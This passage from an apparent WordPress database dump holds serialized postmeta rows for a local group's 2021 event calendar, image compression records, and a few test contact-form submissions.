l\";a:4:{s:4:\"file\";s:26:\"green-mtn-path-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"green-mtn-path-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(146785,265639,'mec_advanced_days','a:0:{}'),(146784,265639,'mec_repeat_end_at_date',''),(146783,265639,'mec_in_days',''),(146782,265639,'mec_not_in_days',''),(146781,265639,'mec_hourly_schedules','a:0:{}'),(146780,265639,'mec_fees_global_inheritance','1'),(146779,265639,'mec_tickets','a:0:{}'),(146778,265639,'mec_booking','a:0:{}'),(146777,265639,'mec_fees','a:0:{}'),(146776,265639,'mec_ticket_variations_global_inheritance','1'),(146775,265639,'mec_ticket_variations','a:0:{}'),(146774,265639,'mec_reg_fields_global_inheritance','1'),(146773,265639,'mec_reg_fields','a:0:{}'),(146772,265639,'mec_bfixed_fields','a:0:{}'),(146771,265639,'mec_op','a:0:{}'),(146770,265639,'mec_fields','a:0:{}'),(146767,265639,'mec_hide_time','0'),(146768,265639,'mec_hide_end_time','0'),(146769,265639,'mec_event_status','EventScheduled'),(146759,265639,'mec_start_time_minutes','0'),(146760,265639,'mec_public','1'),(146761,265639,'mec_start_date','2021-10-19'),(146762,265639,'mec_start_time_hour','7'),(146763,265639,'mec_countdown_method','global'),(146764,265639,'mec_timezone','global'),(146765,265639,'mec_comment',''),(146766,265639,'one_occurrence','0'),(146758,265639,'mec_start_time_ampm','PM'),(146757,265639,'mec_start_day_seconds','68400'),(146756,265639,'mec_end_date','2021-10-19'),(146755,265639,'mec_end_time_hour','8'),(146754,265639,'mec_end_time_minutes','0'),(146753,265639,'mec_end_time_ampm','PM'),(146752,265639,'mec_end_day_seconds','72000'),(146751,265639,'mec_repeat_status','0'),(146750,265639,'mec_repeat_type',''),(146749,265639,'mec_more_info',''),(145233,265426,'mec_end_day_seconds','41400'),(145232,265426,'mec_end_time_ampm','AM'),(145231,265426,'mec_end_time_minutes','30'),(145230,265426,'mec_end_time_hour','11'),(145229,265426,'mec_end_date','2021-09-05'),(128998,263460,'original-file','2021/01/green-mtn-path-updraft-pre-smush-original.jpg'),(128999,263460,'smush-complete','1'),(129000,263460,'smush-info','The file was compressed from 34.80 KB to 33.40 KB saving 4.02 percent using WP-Optimize'),(129001,263460,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:35631;s:12:\"smushed-size\";i:34198;s:15:\"savings-percent\";d:4.019999999999999573674358543939888477325439453125;}'),(145228,265426,'mec_start_day_seconds','37800'),(145227,265426,'mec_start_time_ampm','AM'),(145226,265426,'mec_start_time_minutes','30'),(145225,265426,'mec_start_time_hour','10'),(145224,265426,'mec_start_date','2021-09-05'),(145223,265426,'mec_organizer_id','1'),(145222,265426,'mec_dont_show_map','0'),(145221,265426,'mec_location_id','122'),(145220,265426,'mec_color',''),(145219,265426,'protect_children',''),(145218,265426,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-09-05\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-09-05\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(145217,265426,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(145216,265426,'mec_certain_weekdays','a:0:{}'),(145215,265426,'mec_repeat_status','0'),(145214,265426,'mec_comment',''),(145213,265426,'mec_hide_end_time','0'),(145212,265426,'mec_hide_time','0'),(145211,265426,'mec_allday','0'),(145210,265426,'mec_advanced_days','a:0:{}'),(145209,265426,'mec_repeat_end_at_date',''),(145208,265426,'mec_repeat_end_at_occurrences',''),(145207,265426,'mec_repeat_end',''),(145206,265426,'mec_repeat_interval','1'),(145205,265426,'mec_repeat_type',''),(145204,265426,'mec_in_days',''),(145203,265426,'mec_not_in_days',''),(145202,265426,'mec_hourly_schedules','a:0:{}'),(145201,265426,'mec_booking','a:0:{}'),(145200,265426,'mec_tickets','a:0:{}'),(145199,265426,'mec_fees_global_inheritance','1'),(145198,265426,'mec_fees','a:0:{}'),(145197,265426,'mec_ticket_variations_global_inheritance','1'),(145196,265426,'mec_ticket_variations','a:0:{}'),(145195,265426,'mec_reg_fields_global_inheritance','1'),(145194,265426,'mec_reg_fields','a:0:{}'),(145193,265426,'mec_op','a:0:{}'),(145192,265426,'mec_event_date_submit','20210422105713'),(145191,265426,'_edit_lock','1630114980:2'),(145190,265426,'_edit_last','2'),(145188,265426,'mec_read_more',''),(145187,265426,'mec_more_info',''),(145186,265426,'mec_more_info_title',''),(145185,265426,'mec_more_info_target','_self'),(145184,265426,'mec_cost',''),(145183,265426,'mec_currency','a:0:{}'),(145182,265426,'mec_additional_organizer_ids','a:0:{}'),(145181,265426,'mec_additional_location_ids','a:0:{}'),(145180,265426,'one_occurrence','0'),(145179,265426,'mec_timezone','global'),(145178,265426,'mec_countdown_method','global'),(145177,265426,'mec_public','1'),(145176,265426,'mec_bfixed_fields','a:0:{}'),(145175,265426,'mec_fields','a:0:{}'),(145174,265426,'mec_event_status','EventScheduled'),(145173,265426,'mec_moved_online_link',''),(145172,265426,'mec_cancelled_reason',''),(145171,265426,'mec_display_cancellation_reason_in_single_page',''),(143523,265134,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(143522,265134,'mec_display_cancellation_reason_in_single_page',''),(143521,265134,'mec_cancelled_reason',''),(129115,263481,'_wp_attached_file','2021/01/ELSS-1-27-2021.jpg'),(129116,263481,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:397;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2021/01/ELSS-1-27-2021.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"ELSS-1-27-2021-238x300.jpg\";s:5:\"width\";i:238;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"ELSS-1-27-2021-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"ELSS-1-27-2021-397x250.jpg\";s:5:\"width\";i:397;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:6:\"Picasa\";s:6:\"camera\";s:8:\"DSC-W730\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1519078047\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"5.91\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160528,266604,'mec_certain_weekdays','a:0:{}'),(160527,266604,'mec_repeat','a:6:{s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:0:\"\";}'),(159207,266532,'_edit_last','2'),(159206,266532,'_edit_lock','1659714356:2'),(159205,266467,'_wp_old_slug','test-without-using-booking-component-3-29-22'),(159204,266531,'_seq_num','103'),(159203,266531,'_form_id','13'),(159202,266531,'_field_138','FYI I couldn’t access the link to RSVP so I’m doing it this way. FYI '),(129135,263526,'protect_children',''),(129136,263526,'_field_312','Testing'),(129137,263526,'_field_313','testtest'),(129138,263526,'_field_333','555-555-5555'),(129139,263526,'_field_314','choll.03@comcast.net'),(129140,263526,'_field_315','This is a test'),(129141,263526,'_field_316','Testing \nsdkfja;lsdfjalsdkjfa\nasdlkfja;lskdfjalsdkjfgfghopewritoprewt'),(129142,263526,'_form_id','35'),(129143,263526,'_seq_num','43'),(129144,263527,'protect_children',''),(129145,263527,'_field_362','Testing'),(129146,263527,'_field_363','Mountain-testing'),(129147,263527,'_field_370','555-555-5555'),(129148,263527,'_field_364','choll.03@comcast.net'),(129149,263527,'_field_365','Testing Mountain areas'),(129150,263527,'_field_366','Testing\ndsfasfkasd;lfkjasdf\nasdfasdgkljdg;las\nadsglkajsdg;lkajd'),(129151,263527,'_form_id','39'),(129152,263527,'_seq_num','1'),(129153,33457,'passster_activate_protection',NULL),(129154,33457,'passster_protection_type','password'),(131881,263791,'_EventOrigin','events-calendar'),(131882,263791,'_EventOrigin','events-calendar'),(131883,263791,'_EventOrigin','events-calendar'),(131884,263791,'_EventOrigin','events-calendar'),(131885,263791,'_EventOrigin','events-calendar'),(131886,263791,'_EventOrigin','events-calendar'),(131887,263791,'_EventOrigin','events-calendar'),(131888,263791,'_EventOrigin','events-calendar'),(131889,263791,'_EventOrigin','events-calendar'),(131890,263791,'_EventOrigin','events-calendar'),(131891,263791,'_thumbnail_id','263792'),(131879,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(131893,263791,'_EventShowMapLink',''),(131903,263791,'_EventURL',''),(129168,263481,'original-file','2021/01/ELSS-1-27-2021-updraft-pre-smush-original.jpg'),(129169,263481,'smush-complete','1'),(129170,263481,'smush-info','The file was compressed from 96.96 KB to 73.07 KB saving 24.64 percent using WP-Optimize'),(129171,263481,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:99283;s:12:\"smushed-size\";i:74821;s:15:\"savings-percent\";d:24.6400000000000005684341886080801486968994140625;}'),(131904,263791,'_EventTimezone','America/Denver'),(131878,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(131892,263791,'boldgrid_hide_page_title','0'),(143447,265131,'_seq_num','73'),(143453,264623,'sg_popup_target_custom','a:1:{i:0;s:6:\"264853\";}'),(143454,264623,'sgpb_popup_events_custom','a:1:{i:264853;a:1:{i:0;s:5:\"click\";}}'),(129794,263610,'_RTECmaxRegistrations','30'),(129905,263592,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953568;s:12:\"_EventOrigin\";i:1611953568;s:13:\"_thumbnail_id\";i:1611953568;s:26:\"_RTECregistrationsDisabled\";i:1611953568;s:17:\"_RTECdeadlineType\";i:1611953568;s:19:\"_RTECwhoCanRegister\";i:1611953568;s:23:\"_RTEClimitRegistrations\";i:1611953568;s:21:\"_RTECmaxRegistrations\";i:1611953568;s:24:\"boldgrid_hide_page_title\";i:1611953568;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1611953568;s:13:\"_EventShowMap\";i:1611953568;s:20:\"_EventCurrencySymbol\";i:1611953568;s:22:\"_EventCurrencyPosition\";i:1611953568;s:10:\"_EventCost\";i:1611953568;s:9:\"_EventURL\";i:1611953568;s:14:\"_EventTimezone\";i:1611953568;s:12:\"_dp_original\";i:1611953568;s:13:\"_EventVenueID\";i:1611953568;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953568;}'),(129898,263591,'_EventCurrencyPosition','prefix'),(129886,263591,'_EventOrigin','events-calendar'),(129888,263591,'_RTECregistrationsDisabled','1'),(129889,263591,'_RTECdeadlineType','start'),(129890,263591,'_RTECwhoCanRegister','any'),(129891,263591,'_RTEClimitRegistrations','0'),(129885,263591,'_EventOrigin','events-calendar'),(129895,263591,'_EventShowMapLink','1'),(129896,263591,'_EventShowMap','1'),(129897,263591,'_EventCurrencySymbol',''),(129857,263590,'protect_children',''),(129858,263590,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953568;s:12:\"_EventOrigin\";i:1611953568;s:13:\"_thumbnail_id\";i:1611953568;s:26:\"_RTECregistrationsDisabled\";i:1611953568;s:17:\"_RTECdeadlineType\";i:1611953568;s:19:\"_RTECwhoCanRegister\";i:1611953568;s:23:\"_RTEClimitRegistrations\";i:1611953568;s:21:\"_RTECmaxRegistrations\";i:1611953568;s:24:\"boldgrid_hide_page_title\";i:1611953568;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1611953568;s:13:\"_EventShowMap\";i:1611953568;s:20:\"_EventCurrencySymbol\";i:1611953568;s:22:\"_EventCurrencyPosition\";i:1611953568;s:10:\"_EventCost\";i:1611953568;s:9:\"_EventURL\";i:1611953568;s:14:\"_EventTimezone\";i:1611953568;s:12:\"_dp_original\";i:1611953568;s:13:\"_EventVenueID\";i:1611953568;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953568;}'),(129792,263610,'_RTECwhoCanRegister','any'),(129899,263591,'_EventCost',''),(129900,263591,'_EventURL',''),(129793,263610,'_RTEClimitRegistrations','0'),(129303,263591,'_EventStartDate','2021-04-17 16:00:00'),(129304,263591,'_EventStartDateUTC','2021-04-17 22:00:00'),(129901,263591,'_EventTimezone','America/Denver'),(129305,263591,'_EventEndDate','2021-04-17 17:00:00'),(129306,263591,'_EventEndDateUTC','2021-04-17 23:00:00'),(129307,263591,'_EventDuration','3600'),(129790,263610,'_RTECregistrationsDisabled','1'),(129881,263591,'protect_children',''),(129882,263591,'protect_children',''),(129883,263591,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953568;s:12:\"_EventOrigin\";i:1611953568;s:13:\"_thumbnail_id\";i:1611953568;s:26:\"_RTECregistrationsDisabled\";i:1611953568;s:17:\"_RTECdeadlineType\";i:1611953568;s:19:\"_RTECwhoCanRegister\";i:1611953568;s:23:\"_RTEClimitRegistrations\";i:1611953568;s:21:\"_RTECmaxRegistrations\";i:1611953568;s:24:\"boldgrid_hide_page_title\";i:1611953568;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1611953568;s:13:\"_EventShowMap\";i:1611953568;s:20:\"_EventCurrencySymbol\";i:1611953568;s:22:\"_EventCurrencyPosition\";i:1611953568;s:10:\"_EventCost\";i:1611953568;s:9:\"_EventURL\";i:1611953568;s:14:\"_EventTimezone\";i:1611953568;s:12:\"_dp_original\";i:1611953568;s:13:\"_EventVenueID\";i:1611953568;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953568;}'),(129903,263591,'_EventVenueID','263589'),(129904,263591,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263590;a:2:{s:9:\"timestamp\";i:1616256000;s:8:\"duration\";i:3600;}i:263591;a:2:{s:9:\"timestamp\";i:1618675200;s:8:\"duration\";i:3600;}i:263592;a:2:{s:9:\"timestamp\";i:1621094400;s:8:\"duration\";i:3600;}i:263593;a:2:{s:9:\"timestamp\";i:1624118400;s:8:\"duration\";i:3600;}i:263594;a:2:{s:9:\"timestamp\";i:1626537600;s:8:\"duration\";i:3600;}i:263595;a:2:{s:9:\"timestamp\";i:1629561600;s:8:\"duration\";i:3600;}i:263596;a:2:{s:9:\"timestamp\";i:1631980800;s:8:\"duration\";i:3600;}i:263597;a:2:{s:9:\"timestamp\";i:1634400000;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(129884,263591,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953568;s:12:\"_EventOrigin\";i:1611953568;s:13:\"_thumbnail_id\";i:1611953568;s:26:\"_RTECregistrationsDisabled\";i:1611953568;s:17:\"_RTECdeadlineType\";i:1611953568;s:19:\"_RTECwhoCanRegister\";i:1611953568;s:23:\"_RTEClimitRegistrations\";i:1611953568;s:21:\"_RTECmaxRegistrations\";i:1611953568;s:24:\"boldgrid_hide_page_title\";i:1611953568;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1611953568;s:13:\"_EventShowMap\";i:1611953568;s:20:\"_EventCurrencySymbol\";i:1611953568;s:22:\"_EventCurrencyPosition\";i:1611953568;s:10:\"_EventCost\";i:1611953568;s:9:\"_EventURL\";i:1611953568;s:14:\"_EventTimezone\";i:1611953568;s:12:\"_dp_original\";i:1611953568;s:13:\"_EventVenueID\";i:1611953568;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953568;}'),(129791,263610,'_RTECdeadlineType','start'),(129892,263591,'_RTECmaxRegistrations','30'),(129893,263591,'boldgrid_hide_page_title','0'),(129894,263591,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"6\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-16\";s:14:\"EventStartDate\";s:19:\"2021-02-20 16:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-20 17:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(129336,263592,'_EventStartDate','2021-05-15 16:00:00'),(129337,263592,'_EventStartDateUTC','2021-05-15 22:00:00'),(129795,263610,'boldgrid_hide_page_title','0'),(129338,263592,'_EventEndDate','2021-05-15 17:00:00'),(129339,263592,'_EventEndDateUTC','2021-05-15 23:00:00'),(130349,263622,'_EventShowMapLink','1'),(130350,263622,'_EventShowMap','1'),(130351,263622,'_EventCurrencySymbol',''),(130352,263622,'_EventCurrencyPosition','prefix'),(130353,263622,'_EventCost',''),(130354,263622,'_EventURL',''),(130355,263622,'_EventTimezone','America/Denver'),(130356,263622,'_dp_original','263319'),(130357,263622,'_EventVenueID','263589'),(130358,263622,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263622;a:2:{s:9:\"timestamp\";i:1615917600;s:8:\"duration\";i:3600;}i:263623;a:2:{s:9:\"timestamp\";i:1618941600;s:8:\"duration\";i:3600;}i:263624;a:2:{s:9:\"timestamp\";i:1621360800;s:8:\"duration\";i:3600;}i:263625;a:2:{s:9:\"timestamp\";i:1623780000;s:8:\"duration\";i:3600;}i:263626;a:2:{s:9:\"timestamp\";i:1626804000;s:8:\"duration\";i:3600;}i:263627;a:2:{s:9:\"timestamp\";i:1629223200;s:8:\"duration\";i:3600;}i:263628;a:2:{s:9:\"timestamp\";i:1632247200;s:8:\"duration\";i:3600;}i:263629;a:2:{s:9:\"timestamp\";i:1634666400;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130359,263623,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130339,263622,'_EventOrigin','events-calendar'),(130340,263622,'_EventOrigin','events-calendar'),(130338,263622,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(151776,266078,'mec_moved_online_link',''),(130342,263622,'_RTECregistrationsDisabled','1'),(130343,263622,'_RTECdeadlineType','start'),(130344,263622,'_RTECwhoCanRegister','any'),(130345,263622,'_RTEClimitRegistrations','0'),(130346,263622,'_RTECmaxRegistrations','30'),(130347,263622,'boldgrid_hide_page_title','0'),(130348,263622,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-19\";s:14:\"EventStartDate\";s:19:\"2021-02-16 18:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-16 19:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130335,263622,'protect_children',''),(130336,263622,'protect_children',''),(130337,263622,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(134104,264081,'original-file','2021/03/mountain-eagle-zoomlogin-5-362-517-updraft-pre-smush-original.jpg'),(134105,264081,'smush-complete','1'),(134106,264081,'smush-info','The file was compressed from 36.63 KB to 35.40 KB saving 3.36 percent using WP-Optimize'),(130377,263623,'_EventCurrencyPosition','prefix'),(130378,263623,'_EventCost',''),(130379,263623,'_EventURL',''),(130380,263623,'_EventTimezone','America/Denver'),(130092,263623,'_EventStartDate','2021-04-20 18:00:00'),(130093,263623,'_EventStartDateUTC','2021-04-21 00:00:00'),(130094,263623,'_EventEndDate','2021-04-20 19:00:00'),(130095,263623,'_EventEndDateUTC','2021-04-21 